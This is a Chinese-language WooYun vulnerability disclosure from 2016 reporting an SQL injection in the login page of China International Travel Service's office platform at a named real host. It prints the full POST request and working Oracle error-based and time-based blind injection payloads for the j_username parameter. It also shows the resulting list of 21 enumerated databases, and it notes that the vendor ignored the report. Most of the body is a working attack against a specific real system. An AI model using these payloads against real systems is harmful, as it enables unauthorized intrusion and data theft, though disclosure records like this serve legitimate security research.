当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0172317

漏洞标题:中国国旅协同办公平台POST注入

相关厂商:中国国旅

漏洞作者: 路人甲

提交时间:2016-01-25 17:27

修复时间:2016-01-30 17:30

公开时间:2016-01-30 17:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-25: 细节已通知厂商并且等待厂商处理中
2016-01-30: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

分站后台POST注入

http://bbs.cits.com.cn/easoa/themes/mskin/login/login.jsp


POST /easoa/login/kingdee_sso_auth.jsp HTTP/1.1
Host: bbs.cits.com.cn
Content-Length: 98
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://bbs.cits.com.cn
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://bbs.cits.com.cn/easoa/themes/mskin/login/login.jsp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=rGQBLx7SVqRWpP6W6GBgz0f7kDtsPgXF2UcA; userClose=0
j_mode=static&j_locale=zh_CN&j_username=liuchao&j_password=123456&Submit3=%E7%99%BB%C2%A0%E5%BD%95

漏洞证明:

---
Parameter: j_username (POST)
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: j_mode=static&j_locale=zh_CN&j_username=liuchao') AND 5972=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(107)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (5972=5972) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(120)||CHR(107)||CHR(113)||CHR(62))) FROM DUAL) AND ('RrwV'='RrwV&j_password=123456&Submit3=%E7%99%BB%C2%A0%E5%BD%95
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: j_mode=static&j_locale=zh_CN&j_username=liuchao') AND 1043=DBMS_PIPE.RECEIVE_MESSAGE(CHR(120)||CHR(110)||CHR(82)||CHR(79),5) AND ('Apfd'='Apfd&j_password=123456&Submit3=%E7%99%BB%C2%A0%E5%BD%95
---
web server operating system: Linux
web application technology: Servlet 2.5, JSP, JSP 2.1
back-end DBMS: Oracle
available databases [21]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EAS1102
[*] EAS1109
[*] EAS1116
[*] EAS70
[*] EAS70TEST
[*] EXFSYS
[*] MDSYS
[*] OADB
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB

q4.png

共21个库20999个表

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-01-30 17:30

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无


漏洞评价:

评价